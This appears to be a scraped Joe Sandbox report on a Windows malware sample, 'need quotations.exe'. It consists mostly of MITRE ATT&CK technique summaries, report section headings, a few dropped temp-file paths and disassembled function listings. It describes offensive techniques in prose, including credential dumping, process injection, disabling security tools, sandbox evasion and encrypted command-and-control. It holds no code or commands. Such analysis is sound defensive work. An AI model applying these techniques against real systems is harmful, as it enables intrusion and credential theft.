Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report need quotations.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\a155F05G

C:\Users\user\AppData\Local\Temp\autEBE3.tmp

C:\Users\user\AppData\Local\Temp\immortaliser

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
need quotations.exe

Function 0026B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00243D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0025DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0024406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0028FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 00243F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0028BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00243742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00243E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 019499C8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 002436B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01949788 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Function 00244A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre